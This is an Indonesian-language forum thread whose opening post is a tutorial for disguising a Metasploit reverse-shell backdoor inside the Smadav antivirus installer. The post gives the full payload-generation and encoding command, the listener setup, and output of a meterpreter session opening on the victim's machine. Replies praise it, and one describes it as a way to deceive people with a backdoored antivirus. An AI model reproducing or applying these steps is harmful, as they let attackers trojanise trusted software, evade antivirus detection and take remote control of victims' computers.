[Share] Menyamarkan virus pada Antivirus Installer
#1
Tutorial kali ini adalah tentang bagaimana kita melakukan penyamaran backdoor yang kita sisipi di dalam sebuah file .exe windows dengan metasploit. Langsung sja gk perlu basa basi ..

Untuk percobaan kli ini saya pakai sistem operasi dracos … hmm untuk peretas-peretas OS lainnya tinggal menyesuaikan saja.

pertama-tama mari kita buat backdoor dengan menyisipkannya pada sebuah file exe .. kali ni saya pilih installer antivirus smadav

download disini guys
http://smadav.web.id/download/

klo sudah saatnya msfpayload salah satu andalan metasploit dalam sisi maintaining access memulai aksinya
Code:
root@dracos:~# cd /opt/metasploit-4.4.0/msf3

Code:
root@dracos:/opt/metasploit-4.4.0/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.4 LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 10 -t exe -x /root/Downloads/smadav91.exe -o /var/www/smadav91.exe

Quote:[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
[*]


dimana :
- windows/meterpreter/reverse_tcp adalah tipe payload bisa di sesuikan dengan keperluan (meterpreter/bind) ( reverse_tcp, reverse_http, reverse_https)
- LHOST ( localhost) adalah alamat IP kita
- LPORT ( localport ) adalah port lokal yang akan kita gunakan dalam menjalankan listener ( reverse )
-c Jumlah enskripsi
-t tipe backdoor
-x posisi file exe yang hendak kita injeksi
-o output hasil file yang telah di injeksi ( backdoor result ) kaborr

Jangan lupa buat listener yah …


Quote:root@dracos:~# msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 969 exploits - 511 auxiliary - 155 post
+ -- --=[ 261 payloads - 28 encoders - 8 nops

msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.2.4
LHOST => 192.168.2.4
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
---- --------------- -------- -----------


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique: seh,
thread, process, none
LHOST 192.168.2.4 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit


[*] Started reverse handler on 192.168.2.4:4444
[*]Starting the payload handler...
[*]

[*]

wew .. mari kita lihat penampakan jenis file ini pada kompi target …
[Image: backdoor_in_exe.png]

hmm sekilas terlihat sama persisi .. dan ketika korban melakukan esekusi .. its work like a charm happy


Code:
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.2.4:4444
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.2.5
[*] Meterpreter session 1 opened (192.168.2.4:4444 ->
192.168.2.5:1816) at 2012-11-30 01:44:27 +0700

meterpreter >
[*][*]


[*]

silahkan kreasikan backdoor dengan file-file exe yang lain ..
selamat berkarya..

FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#2
wiidih..
ijin praktek ya om Smile
apapun jika ditekuni akan menampakan hasilnya










Bersyukurlah tuhan masih memberikan nikmat internet kepada kita

#3
wah berarti smadavnya ga bisa detek meterpreter ya om? surem haha
+1 dari ane

#4
itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error?
itu kalau file smadav yg sudah di inject dengan payload di klik 2 kali, apakah proses instalasi smadav nya akan berjalan, atau akan muncul pesan error?

#5
makasih om ilmunya Big Grin , alternatif buat nipu pake antivirus backdoornya atau file lain
Every one Have Superiority that you don't know..

#6
wew keren om zee hahaha dirumah praktek aaah

#7
nice share om..., terus berbagi ya om..., Big Grin
:-bd
root@bt:~# cat about_me
I'm just a linuxer....!!! ^_^
root@bt:~#

#8
surem om wkwkwkwk . .
asli nga kedetec wkwkwk . . .
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#9
itu harus 1 wlan lagi ya om ?? atau work offline ??

#10
ayo2,, ada yg bisa deface ga ?






Users browsing this thread: 3 Guest(s)